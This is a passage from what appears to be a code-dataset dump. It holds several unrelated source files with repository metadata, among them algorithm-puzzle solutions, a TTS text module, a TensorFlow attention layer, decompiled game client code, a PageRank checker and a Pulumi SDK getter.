# print(location)
# print('********************************')
# print(company)
# print('\n ############################# \n')
print(final_results)
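
# Hedged follow-up: persist the scraped rows to CSV (the filename is
# illustrative, not part of the original demo).
import csv

with open('monster_jobs.csv', 'w', newline='') as f:
    writer = csv.DictWriter(f, fieldnames=['title', 'location', 'company'])
    writer.writeheader()
    writer.writerows(final_results)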
| [
"[email protected]"
] | |
5397b361705d553e3e3310f32c847b29f535c167 | 60d5ea4f007d49768d250ef394003f554003e4d0 | /python/Depth-first Search/116.Populating Next Right Pointers in Each Node.py | 885f028bc97eeb83c99f1867befd8577674b88a1 | [] | no_license | EvanJamesMG/Leetcode | dd7771beb119ea1250dbb3b147a09053298cd63b | fa638c7fda3802e9f4e0751a2c4c084edf09a441 | refs/heads/master | 2021-01-10T17:11:10.896393 | 2017-12-01T16:04:44 | 2017-12-01T16:04:44 | 46,968,756 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,655 | py | # coding=utf-8
'''
Given a binary tree
struct TreeLinkNode {
TreeLinkNode *left;
TreeLinkNode *right;
TreeLinkNode *next;
}
Populate each next pointer to point to its next right node. If there is no next right node, the next pointer should be set to NULL.
Initially, all next pointers are set to NULL.
Note:
You may only use constant extra space.
You may assume that it is a perfect binary tree (ie, all leaves are at the same level, and every parent has two children).
For example,
Given the following perfect binary tree,
1
/ \
2 3
/ \ / \
4 5 6 7
After calling your function, the tree should look like:
1 -> NULL
/ \
2 -> 3 -> NULL
/ \ / \
4->5->6->7 -> NULL
'''
# Definition for a binary tree node.
'''
Depth-first search
'''
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
'''
One recursion does it: for every node, link its left and right subtrees via
next pointers down the inner seam (left child's rightmost path to the right
child's leftmost path), all the way to the last level; then recurse on the
left and right children so their subtrees get linked the same way.
'''
class Solution(object):
def connect(self, root):
"""
:type root: TreeLinkNode
:rtype: nothing
"""
if root:
LR = root.left
RL = root.right
while LR and RL:
LR.next = RL
LR = LR.right
RL = RL.left
self.connect(root.left)
self.connect(root.right)
| [
"[email protected]"
] | |
83aafba4187bb26dfef831f2cb3ecf91c7677d01 | 04dddbf04893913b0b24c6c02ebd2672b774a616 | /다이나믹 프로그래밍/11052 카드 구매하기.py | 565e7ec0c89ae6471533ed01d0209c88d36b7020 | [] | no_license | hatssww/BOJ | ca16345dbe24641e1ca5adee136a858a64a080b0 | bd7363d5c84de281de9b34667e9c0b76a904cffc | refs/heads/main | 2023-05-24T22:23:35.127397 | 2021-06-08T23:36:40 | 2021-06-08T23:36:40 | 370,254,375 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | import sys
n = int(sys.stdin.readline())
p = [0] + list(map(int, sys.stdin.readline().split()))
d = [0] * (n + 1)
d[1] = p[1]
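# Recurrence: d[i] = max over 1 <= j <= i of d[i - j] + p[j]; the best price
# for i cards extends a best solution for i - j cards with one pack of j.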
for i in range(2, n + 1):
for j in range(1, i + 1):
if d[i] < d[i - j] + p[j]:
d[i] = d[i - j] + p[j]
print(d[n]) | [
"[email protected]"
] | |
810c374d5845fa02cb9141659fad67f933c09195 | 3abe7b4d572ae81a8222996821569bf3a684ec14 | /text/__init__.py | e9461d87f13166dac13aea90ab80aead3a0ef212 | [
"BSD-3-Clause",
"MIT"
] | permissive | creotiv/RussianTTS-Tacotron2 | 6c8defdd5a9cafdd46b71f8006162c4bab586d0f | 8ac15eea9450d141cb84d4d1a96b600f43d206c9 | refs/heads/master | 2023-06-01T09:43:12.209652 | 2021-06-10T12:54:24 | 2021-06-10T12:54:24 | 334,964,314 | 13 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,385 | py | """ from https://github.com/keithito/tacotron """
import re
from text import cleaners
from text.symbols import symbols, ctc_symbols
# Mappings from symbol to numeric ID and vice versa:
symbol_to_id = {s: i for i, s in enumerate(symbols)}
_id_to_symbol = {i: s for i, s in enumerate(symbols)}
_ctc_symbole_to_id = {s: i for i, s in enumerate(ctc_symbols)}
# Regular expression matching text enclosed in curly braces:
_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def text_to_sequence(text, cleaner_names):
'''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.
The text can optionally have ARPAbet sequences enclosed in curly braces embedded
in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."
Args:
text: string to convert to a sequence
cleaner_names: names of the cleaner functions to run the text through
Returns:
List of integers corresponding to the symbols in the text
'''
sequence = []
# Check for curly braces and treat their contents as ARPAbet:
while len(text):
m = _curly_re.match(text)
if not m:
sequence += _symbols_to_sequence(_clean_text(text, cleaner_names))
break
sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names))
sequence += _arpabet_to_sequence(m.group(2))
text = m.group(3)
return sequence
def sequence_to_ctc_sequence(sequence):
return [_ctc_symbole_to_id[_id_to_symbol[s]] for s in sequence if _id_to_symbol[s] in ctc_symbols]
def sequence_to_text(sequence):
'''Converts a sequence of IDs back to a string'''
result = ''
for symbol_id in sequence:
if symbol_id in _id_to_symbol:
s = _id_to_symbol[symbol_id]
# Enclose ARPAbet back in curly braces:
if len(s) > 1 and s[0] == '@':
s = '{%s}' % s[1:]
result += s
return result.replace('}{', ' ')
def _clean_text(text, cleaner_names):
for name in cleaner_names:
cleaner = getattr(cleaners, name)
if not cleaner:
raise Exception('Unknown cleaner: %s' % name)
text = cleaner(text)
return text
def _symbols_to_sequence(symbols):
return [symbol_to_id[s] for s in symbols if _should_keep_symbol(s)]
def _arpabet_to_sequence(text):
return _symbols_to_sequence(['@' + s for s in text.split()])
def _should_keep_symbol(s):
    return s in symbol_to_id and s != '_' and s != '~'
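
# Hedged usage sketch (the cleaner name is an assumption; it must exist in
# text/cleaners.py):
#   seq = text_to_sequence("Privet, mir!", ["transliteration_cleaners"])
#   print(sequence_to_text(seq))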
| [
"[email protected]"
] | |
a0af01108c13fc966f89021c5c91150515e97d0d | b9c9215eb12ab8f0dcc4a5d964dc97ac2ad62257 | /supervised_learning/0x11-attention/6-multihead_attention.py | 76729225e985b407847cb68ae5dc2a513672b6cb | [] | no_license | AndrewMiranda/holbertonschool-machine_learning-1 | 0318c2f45c863721b478acae26a5a874290e6445 | e8a98d85b3bfd5665cb04bec9ee8c3eb23d6bd58 | refs/heads/main | 2023-01-19T00:34:15.264705 | 2022-07-25T15:10:43 | 2022-07-25T15:10:43 | 386,514,270 | 0 | 0 | null | 2021-07-16T04:58:08 | 2021-07-16T04:58:07 | null | UTF-8 | Python | false | false | 3,218 | py | #!/usr/bin/env python3
"""File that conatins the class MultiHeadAttention"""
import tensorflow as tf
sdp_attention = __import__('5-sdp_attention').sdp_attention
class MultiHeadAttention(tf.keras.layers.Layer):
"""Class that perform multi head attention"""
def __init__(self, dm, h):
"""
Class constructor
dm is an integer representing the dimensionality of the model
h is an integer representing the number of heads
dm is divisible by h
Sets the following public instance attributes:
h - the number of heads
dm - the dimensionality of the model
depth - the depth of each attention head
Wq - a Dense layer with dm units, used to generate the query matrix
Wk - a Dense layer with dm units, used to generate the key matrix
Wv - a Dense layer with dm units, used to generate the value matrix
linear - a Dense layer with dm units, used to generate the attention
output
"""
        super(MultiHeadAttention, self).__init__()
        # super().__init__() must run before sublayers are attached, otherwise
        # Keras raises an error when the Dense layers are assigned.
        self.h = h
        self.dm = dm
        self.depth = dm // h
        self.Wq = tf.keras.layers.Dense(units=dm)
        self.Wk = tf.keras.layers.Dense(units=dm)
        self.Wv = tf.keras.layers.Dense(units=dm)
        self.linear = tf.keras.layers.Dense(units=dm)
def call(self, Q, K, V, mask):
"""
        Public instance method
Args:
Q is a tensor of shape (batch, seq_len_q, dk) containing the input to
generate the query matrix
K is a tensor of shape (batch, seq_len_v, dk) containing the input to
generate the key matrix
V is a tensor of shape (batch, seq_len_v, dv) containing the input to
generate the value matrix
mask is always None
Returns: output, weights
        output: a tensor with its last two dimensions as (..., seq_len_q, dm)
        containing the scaled dot product attention
        weights: a tensor with its last three dimensions as
        (..., h, seq_len_q, seq_len_v) containing the attention weights
"""
def split_heads(x, batch_size):
"""Split the last dimension into (num_heads, depth).
Transpose the result such that the shape is (batch_size,
num_heads, seq_len, depth)"""
x = tf.reshape(x, (batch_size, -1, self.h, self.depth))
return tf.transpose(x, perm=[0, 2, 1, 3])
batch_size = tf.shape(Q)[0]
q = self.Wq(Q) # (batch_size, seq_len, d_model)
k = self.Wk(K) # (batch_size, seq_len, d_model)
v = self.Wv(V) # (batch_size, seq_len, d_model)
q = split_heads(q, batch_size)
k = split_heads(k, batch_size)
v = split_heads(v, batch_size)
scaled_attention, attention_weights = sdp_attention(q, k, v, mask)
scaled_attention = tf.transpose(scaled_attention,
perm=[0, 2, 1, 3])
concat_attention = tf.reshape(scaled_attention, (batch_size, -1,
self.dm))
output = self.linear(concat_attention)
return output, attention_weights
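
# Hedged shape-check sketch (illustrative values; dm must be divisible by h):
#   mha = MultiHeadAttention(dm=64, h=8)
#   q = tf.random.uniform([2, 5, 64])
#   out, w = mha(q, q, q, mask=None)  # out: [2, 5, 64], w: [2, 8, 5, 5]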
| [
"[email protected]"
] | |
0c24daedded2881c22f5beb167c8ee8b0efba4f0 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/55/usersdata/112/23295/submittedfiles/av2_p3_civil.py | 190a7d9f68a0de2937c3818addab0a1181fc2f81 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
linhas=input('Digite a quantidade de linhas:')
a=np.zeros((linhas,linhas))
for i in range (0,a.shape[0],1):
for j in range(0,a.shape[1],1):
a[i,j]=input('Digite o termo:')
print a
x=input('Digite a coordenada x da localização da torre:')
y=input('Digite a coordenada y da localização da torre:')
def locali(a):
    # The tower cell can be indexed directly; the double loop was unnecessary.
    return a[x, y]
print locali(a)
def soma_linha(a):
s=[]
for i in range (0,a.shape[0],1):
soma=0
for j in range (0,a.shape[1],1):
soma=soma+a[i,j]
s.append(soma)
    return s[y]
print soma_linha(a)
| [
"[email protected]"
] | |
3d753eee73c94b858c52d1e6d561825f5839fb8d | a70697ef62978117467695fd3507e4d08e186ab4 | /source/res/scripts/client/gui/scaleform/daapi/view/lobby/server_events/events_helpers.py | 339785d042db63990f89e8ea039173f16cc705a1 | [] | no_license | chipsi007/WorldOfTanks-Decompiled | d208678a6f2f094b02281d09ecc30f3e32725ce9 | 3b9dc21321429e4dee146c23c7250f2c62757937 | refs/heads/master | 2020-03-19T01:21:09.883951 | 2018-05-04T13:19:56 | 2018-05-04T13:19:56 | 135,538,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,682 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/server_events/events_helpers.py
import operator
from collections import defaultdict
import BigWorld
import constants
from constants import EVENT_TYPE
from gui import makeHtmlString
from gui.Scaleform.daapi.view.lobby.server_events.awards_formatters import OldStyleBonusesFormatter
from gui.Scaleform.genConsts.QUESTS_ALIASES import QUESTS_ALIASES
from gui.Scaleform.locale.PERSONAL_MISSIONS import PERSONAL_MISSIONS
from gui.Scaleform.locale.QUESTS import QUESTS
from gui.Scaleform.locale.TOOLTIPS import TOOLTIPS
from gui.server_events import formatters, conditions, settings as quest_settings
from gui.server_events.events_helpers import EventInfoModel, MISSIONS_STATES, QuestInfoModel
from gui.shared.formatters import text_styles
from helpers import i18n, int2roman, time_utils, dependency
from personal_missions import PM_BRANCH
from quest_xml_source import MAX_BONUS_LIMIT
from skeletons.gui.shared import IItemsCache
_AWARDS_PER_PAGE = 3
FINISH_TIME_LEFT_TO_SHOW = time_utils.ONE_DAY
START_TIME_LIMIT = 5 * time_utils.ONE_DAY
class _EventInfo(EventInfoModel):
def getInfo(self, svrEvents, pCur=None, pPrev=None, noProgressInfo=False):
if noProgressInfo:
status, _ = MISSIONS_STATES.NONE, self._getStatus()[1]
bonusCount = self.NO_BONUS_COUNT
qProgCur, qProgTot, qProgbarType, tooltip = (0,
0,
formatters.PROGRESS_BAR_TYPE.NONE,
None)
else:
bonusCount = self._getBonusCount(pCur)
status, _ = self._getStatus(pCur)
qProgCur, qProgTot, qProgbarType, tooltip = self._getProgressValues(svrEvents, pCur, pPrev)
isAvailable, _ = self.event.isAvailable()
return {'questID': str(self.event.getID()),
'eventType': self.event.getType(),
'IGR': self.event.isIGR(),
'taskType': self.event.getUserType(),
'tasksCount': bonusCount,
'progrBarType': qProgbarType,
'progrTooltip': tooltip,
'maxProgrVal': qProgTot,
'currentProgrVal': qProgCur,
'rendererType': QUESTS_ALIASES.RENDERER_TYPE_QUEST,
'timerDescription': self.getTimerMsg(),
'status': status,
'description': self.event.getUserName(),
'tooltip': TOOLTIPS.QUESTS_RENDERER_LABEL,
'isSelectable': True,
'isNew': quest_settings.isNewCommonEvent(self.event),
'isAvailable': isAvailable}
def getPostBattleInfo(self, svrEvents, pCur, pPrev, isProgressReset, isCompleted):
index = 0
progresses = []
if not isProgressReset and not isCompleted:
for cond in self.event.bonusCond.getConditions().items:
if isinstance(cond, conditions._Cumulativable):
for _, (curProg, totalProg, diff, _) in cond.getProgressPerGroup(pCur, pPrev).iteritems():
label = cond.getUserString()
if not diff or not label:
continue
index += 1
progresses.append({'progrTooltip': None,
'progrBarType': formatters.PROGRESS_BAR_TYPE.SIMPLE,
'maxProgrVal': totalProg,
'currentProgrVal': curProg,
'description': '%d. %s' % (index, label),
'progressDiff': '+ %s' % BigWorld.wg_getIntegralFormat(diff)})
if not progresses:
return
alertMsg = ''
if isProgressReset:
alertMsg = i18n.makeString('#quests:postBattle/progressReset')
_, awards = ('', None)
if not isProgressReset and isCompleted:
awards = self._getBonuses(svrEvents)
return {'title': self.event.getUserName(),
'awards': awards,
'progressList': progresses,
'alertMsg': alertMsg,
'questInfo': self.getInfo(svrEvents, pCur, pPrev),
'personalInfo': [],
'questType': self.event.getType()}
@classmethod
def _getEventsByIDs(cls, ids, svrEvents):
result = {}
for eID in ids:
if eID in svrEvents:
result[eID] = svrEvents[eID]
return result
def _getBonusCount(self, pCur=None):
return self.NO_BONUS_COUNT
def _getProgressValues(self, svrEvents=None, pCur=None, pPrev=None):
return (0,
0,
formatters.PROGRESS_BAR_TYPE.NONE,
None)
def _getBonuses(self, svrEvents, bonuses=None):
return []
class _QuestInfo(_EventInfo, QuestInfoModel):
PROGRESS_TOOLTIP_MAX_ITEMS = 4
itemsCache = dependency.descriptor(IItemsCache)
def _getStatus(self, pCur=None):
if self.event.isCompleted(progress=pCur):
if self.event.bonusCond.isDaily():
msg = self._getCompleteDailyStatus('#quests:details/status/completed/daily')
else:
msg = i18n.makeString('#quests:details/status/completed')
return (MISSIONS_STATES.COMPLETED, msg)
else:
isAvailable, errorMsg = self.event.isAvailable()
if not isAvailable:
timeLeftInfo = self.event.getNearestActivityTimeLeft()
if errorMsg in ('in_future', 'invalid_weekday', 'invalid_time_interval') and timeLeftInfo is not None:
startTimeLeft = timeLeftInfo[0]
if startTimeLeft > START_TIME_LIMIT:
fmt = self._getDateTimeString(self.event.getStartTime())
else:
fmt = self._getTillTimeString(startTimeLeft)
msg = i18n.makeString('#quests:details/status/notAvailable/%s' % errorMsg, time=fmt)
else:
msg = i18n.makeString('#quests:details/status/notAvailable/%s' % errorMsg)
return (MISSIONS_STATES.NOT_AVAILABLE, msg)
bonus = self.event.bonusCond
bonusLimit = bonus.getBonusLimit()
if bonusLimit is None or bonusLimit >= MAX_BONUS_LIMIT:
msg = i18n.makeString(QUESTS.DETAILS_HEADER_COMPLETION_UNLIMITED)
else:
groupBy = bonus.getGroupByValue()
if bonus.isDaily():
key = QUESTS.DETAILS_HEADER_COMPLETION_DAILY
if groupBy is not None:
key = '#quests:details/header/completion/daily/groupBy%s' % groupBy.capitalize()
else:
key = QUESTS.DETAILS_HEADER_COMPLETION_SINGLE
if groupBy is not None:
key = '#quests:details/header/completion/single/groupBy%s' % groupBy.capitalize()
msg = i18n.makeString(key, count=bonusLimit)
return (MISSIONS_STATES.NONE, msg)
def _getBonuses(self, svrEvents, bonuses=None):
bonuses = bonuses or self.event.getBonuses()
result = OldStyleBonusesFormatter(self.event).getFormattedBonuses(bonuses)
return formatters.todict(result) if result else formatters.todict([formatters.packTextBlock(text_styles.alert('#quests:bonuses/notAvailable'))])
def _getBonusCount(self, pCur=None):
if not self.event.isCompleted(progress=pCur):
bonusLimit = self.event.bonusCond.getBonusLimit()
if bonusLimit is None or bonusLimit > 1 or self.event.bonusCond.getGroupByValue() is not None:
return self.event.getBonusCount(progress=pCur)
return self.NO_BONUS_COUNT
def _getProgressValues(self, svrEvents=None, pCur=None, pPrev=None):
current, total, progressType, tooltip = (0,
0,
formatters.PROGRESS_BAR_TYPE.NONE,
None)
groupBy = self.event.bonusCond.getGroupByValue()
condsRoot = self.event.bonusCond.getConditions()
if self.event.isCompleted(pCur) or condsRoot.isEmpty():
return (current,
total,
progressType,
tooltip)
else:
countOfCumulatives = 0
cumulatives = defaultdict(list)
for cond in condsRoot.items:
if isinstance(cond, conditions._Cumulativable):
countOfCumulatives += 1
for groupByKey, (cur, tot, _, isCompleted) in cond.getProgressPerGroup(pCur, pPrev).iteritems():
if not isCompleted:
cumulatives[groupByKey].append((cur, tot))
if groupBy is None and countOfCumulatives == 1 and cumulatives[None]:
(current, total), progressType = cumulatives[None][0], formatters.PROGRESS_BAR_TYPE.SIMPLE
else:
avgProgressesPerGroup = []
for groupByKey, values in cumulatives.iteritems():
progressesSum = sum([ c / float(t) for c, t in values ])
avgProgressesPerGroup.append((groupByKey, int(round(100.0 * progressesSum / len(values))), 100))
avgProgresses = sorted(avgProgressesPerGroup, key=operator.itemgetter(1), reverse=True)
if avgProgresses:
(groupByKey, current, total), nearestProgs = avgProgresses[0], avgProgresses[1:]
progressType = formatters.PROGRESS_BAR_TYPE.COMMON
if groupBy is not None and groupByKey is not None:
name, names = ('', '')
if groupBy == 'vehicle':
name = self.itemsCache.items.getItemByCD(groupByKey).shortUserName
names = [ self.itemsCache.items.getItemByCD(intCD).shortUserName for intCD, _, __ in nearestProgs ]
elif groupBy == 'nation':
name = i18n.makeString('#menu:nations/%s' % groupByKey)
names = [ i18n.makeString('#menu:nations/%s' % n) for n, _, __ in nearestProgs ]
elif groupBy == 'class':
name = i18n.makeString('#menu:classes/%s' % groupByKey)
names = [ i18n.makeString('#menu:classes/%s' % n) for n, _, __ in nearestProgs ]
elif groupBy == 'level':
def makeLvlStr(lvl):
return i18n.makeString(QUESTS.TOOLTIP_PROGRESS_GROUPBY_NOTE_LEVEL, int2roman(lvl))
name = makeLvlStr(int(groupByKey.replace('level ', '')))
names = [ makeLvlStr(int(l.replace('level ', ''))) for l, _, __ in nearestProgs ]
note = None
if names:
note = makeHtmlString('html_templates:lobby/quests/tooltips/progress', 'note', {'names': ', '.join(names[:self.PROGRESS_TOOLTIP_MAX_ITEMS])})
tooltip = {'header': i18n.makeString(QUESTS.TOOLTIP_PROGRESS_GROUPBY_HEADER),
'body': makeHtmlString('html_templates:lobby/quests/tooltips/progress', 'body', {'name': name}),
'note': note}
return (current,
total,
progressType,
tooltip)
class _PersonalMissionInfo(_QuestInfo):
def _getBonuses(self, svrEvents, _=None):
mainBonuses = self.event.getBonuses(isMain=True)
addBonuses = self.event.getBonuses(isMain=False)
return (_QuestInfo._getBonuses(self, None, bonuses=mainBonuses), _QuestInfo._getBonuses(self, None, bonuses=addBonuses))
def getPostBattleInfo(self, svrEvents, pCur, pPrev, isProgressReset, isCompleted):
def _packCondition(titleKey, text):
return '%s\n%s' % (text_styles.middleTitle(i18n.makeString(titleKey)), text_styles.main(text))
def _packStatus(completed):
return 'done' if completed else 'notDone'
return {'title': self.event.getUserName(),
'questInfo': self.getInfo(svrEvents),
'awards': None,
'progressList': [],
'alertMsg': '',
'personalInfo': [{'statusStr': _packStatus(isCompleted[0]),
'text': _packCondition(PERSONAL_MISSIONS.TASKDETAILSVIEW_MAINCONDITIONS, self.event.getUserMainCondition())}, {'statusStr': _packStatus(isCompleted[1]),
'text': _packCondition(PERSONAL_MISSIONS.TASKDETAILSVIEW_ADDITIONALCONDITIONS, self.event.getUserAddCondition())}],
'questType': self.event.getType()}
class _MotiveQuestInfo(_QuestInfo):
def getPostBattleInfo(self, svrEvents, pCur, pPrev, isProgressReset, isCompleted):
motiveQuests = [ q for q in svrEvents.values() if q.getType() == EVENT_TYPE.MOTIVE_QUEST and not q.isCompleted() ]
info = super(_MotiveQuestInfo, self).getPostBattleInfo(svrEvents, pCur, pPrev, isProgressReset, isCompleted)
info.update({'isLinkBtnVisible': len(motiveQuests) > 0})
return info
def getEventInfoData(event):
if event.getType() == constants.EVENT_TYPE.PERSONAL_MISSION:
return _PersonalMissionInfo(event)
if event.getType() == constants.EVENT_TYPE.MOTIVE_QUEST:
return _MotiveQuestInfo(event)
return _QuestInfo(event) if event.getType() in constants.EVENT_TYPE.QUEST_RANGE else _EventInfo(event)
def getEventPostBattleInfo(event, svrEvents=None, pCur=None, pPrev=None, isProgressReset=False, isCompleted=False):
return getEventInfoData(event).getPostBattleInfo(svrEvents, pCur or {}, pPrev or {}, isProgressReset, isCompleted)
_questBranchToTabMap = {PM_BRANCH.REGULAR: QUESTS_ALIASES.SEASON_VIEW_TAB_RANDOM}
| [
"[email protected]"
] | |
181d1d5084af6522c9e3c33e95be5e086608176e | a38b4c82feabe5be163ad2eeb5a46f38aeb88d77 | /regressions/checkPageRank.py | 6980c594526fb6e07683fdcf02458c065697e1c9 | [
"Apache-2.0"
] | permissive | zzmjohn/vertexAPI2 | a9ae240c2fde55dc5be4a96f0017e8a2e204b258 | cf59a50d1239f3ea892a7473f8175958c7ac0051 | refs/heads/master | 2020-12-29T01:23:04.602915 | 2013-12-16T18:32:17 | 2013-12-16T18:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,570 | py | #!/usr/bin/python2
#script to compare pagerank outputs
import sys
from math import fabs
#load ranks from the open file f
def load( f ):
ret = {}
for line in f:
vid, val = line.strip().split()
ret[ int(vid) ] = float(val)
return ret
def compare( tol_vals, tol_allowed, test, gold ):
histo_counts = [0] * (len(tol_vals) + 1)
for vid, val in test.items():
try:
diff = fabs( gold[ vid ] - val )
pos = len(tol_vals) - 1
while pos >= 0 and diff < tol_vals[pos]:
pos -= 1
histo_counts[pos + 1] += 1
except KeyError:
print "vid ", vid, " is in test but not in gold"
#this is not an error, we just output all vertices
#but powergraph does not
#return False
totalItems = float(len(test))
for idx in range(len(histo_counts)):
histo_counts[idx] /= totalItems
if histo_counts[idx] > tol_allowed[idx]:
print "Percentage too high: ", tol_allowed[idx], histo_counts[idx]
return False
return True
if __name__ == '__main__':
if len( sys.argv ) != 3:
print "Usage: checkPageRank.py test gold"
sys.exit(1)
test = sys.argv[1]
gold = sys.argv[2]
td = load( open(test) )
gd = load( open(gold) )
#this means we allow up to 100% of values differing by less than .0001
#.9% of values by more than .0001 and less than .001
#.09% of values by more than .001 and less than .01
#.009% of values by more than .01 and less than .1
#0 values more than .1
if not compare( [.0001, .001, .01, .1, 1, 10], [1., 1e-2, 5e-3, 5e-4, 5e-5, 5e-6, 0], td, gd ):
sys.exit(1)
| [
"[email protected]"
] | |
b5aab17911c032c7a93a159e063628fc4536e61e | bcb56cc126ea1885eb5ecc920884e2e331def045 | /Part A/Déjà Vu.py | a510d4a81463d13148adb3624a1c08c02197962b | [] | no_license | priyanshkedia04/Codeforces-Solutions | 2d11cb7b8329fe658f983b7212c17fc89fd784f0 | a5197c633bf4c3238f48bfb5b308144c2ffba473 | refs/heads/main | 2023-06-06T13:10:13.787843 | 2021-07-01T14:06:52 | 2021-07-01T14:06:52 | 382,000,707 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | for i in range(int(input())):
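    # Strategy: prepend or append a single letter 'a'; the result stops being
    # a palindrome unless s consists solely of 'a', in which case print NO.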
s = input()
temp1 = s + 'a'
temp2 = 'a' + s
if temp2 != temp2[::-1]:
print('YES')
print(temp2)
elif temp1 != temp1[::-1]:
print('YES')
print(temp1)
else:
print('NO') | [
"[email protected]"
] | |
a373c25612d158c45a37dc78cace10f973142be9 | 824b582c2e0236e987a29b233308917fbdfc57a7 | /sdk/python/pulumi_google_native/datacatalog/v1/get_taxonomy_iam_policy.py | f0fed1764ad2f9761170c7b668b41b7acf80b119 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | 24601/pulumi-google-native | ce8faf8455609a9572a8cbe0638c66427bf0ae7f | b219a14201c6c58eaa10caaeacbdaab528931adf | refs/heads/master | 2023-08-23T05:48:31.819709 | 2021-10-08T18:50:44 | 2021-10-08T18:50:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,399 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetTaxonomyIamPolicyResult',
'AwaitableGetTaxonomyIamPolicyResult',
'get_taxonomy_iam_policy',
'get_taxonomy_iam_policy_output',
]
@pulumi.output_type
class GetTaxonomyIamPolicyResult:
def __init__(__self__, bindings=None, etag=None, version=None):
if bindings and not isinstance(bindings, list):
raise TypeError("Expected argument 'bindings' to be a list")
pulumi.set(__self__, "bindings", bindings)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if version and not isinstance(version, int):
raise TypeError("Expected argument 'version' to be a int")
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def bindings(self) -> Sequence['outputs.BindingResponse']:
"""
Associates a list of `members` to a `role`. Optionally, may specify a `condition` that determines how and when the `bindings` are applied. Each of the `bindings` must contain at least one member.
"""
return pulumi.get(self, "bindings")
@property
@pulumi.getter
def etag(self) -> str:
"""
`etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other. It is strongly suggested that systems make use of the `etag` in the read-modify-write cycle to perform policy updates in order to avoid race conditions: An `etag` is returned in the response to `getIamPolicy`, and systems are expected to put that etag in the request to `setIamPolicy` to ensure that their change will be applied to the same version of the policy. **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def version(self) -> int:
"""
Specifies the format of the policy. Valid values are `0`, `1`, and `3`. Requests that specify an invalid value are rejected. Any operation that affects conditional role bindings must specify version `3`. This requirement applies to the following operations: * Getting a policy that includes a conditional role binding * Adding a conditional role binding to a policy * Changing a conditional role binding in a policy * Removing any role binding, with or without a condition, from a policy that includes conditions **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost. If a policy does not include any conditions, operations on that policy may specify any valid version or leave the field unset. To learn which resources support conditions in their IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/conditions/resource-policies).
"""
return pulumi.get(self, "version")
class AwaitableGetTaxonomyIamPolicyResult(GetTaxonomyIamPolicyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetTaxonomyIamPolicyResult(
bindings=self.bindings,
etag=self.etag,
version=self.version)
def get_taxonomy_iam_policy(location: Optional[str] = None,
project: Optional[str] = None,
taxonomy_id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetTaxonomyIamPolicyResult:
"""
Gets the IAM policy for a policy tag or a taxonomy.
"""
__args__ = dict()
__args__['location'] = location
__args__['project'] = project
__args__['taxonomyId'] = taxonomy_id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('google-native:datacatalog/v1:getTaxonomyIamPolicy', __args__, opts=opts, typ=GetTaxonomyIamPolicyResult).value
return AwaitableGetTaxonomyIamPolicyResult(
bindings=__ret__.bindings,
etag=__ret__.etag,
version=__ret__.version)
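# Hypothetical usage sketch (identifiers are illustrative, not from this repo):
#
#     policy = get_taxonomy_iam_policy(
#         location="us-central1",
#         project="my-project",
#         taxonomy_id="my-taxonomy")
#     pulumi.export("taxonomy_policy_etag", policy.etag)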
@_utilities.lift_output_func(get_taxonomy_iam_policy)
def get_taxonomy_iam_policy_output(location: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[Optional[str]]] = None,
taxonomy_id: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetTaxonomyIamPolicyResult]:
"""
Gets the IAM policy for a policy tag or a taxonomy.
"""
...
| [
"[email protected]"
] | |
7e79b503b18d0387b9dfa5034bb0f9a4e2e53d84 | 48d1002394d233cf5932c7ef69300400af79118a | /examples/widgets/effectwidget.py | aeaf2d149fa96c8762405a9a404318773e80f479 | [
"LGPL-2.1-only",
"MIT",
"Apache-2.0"
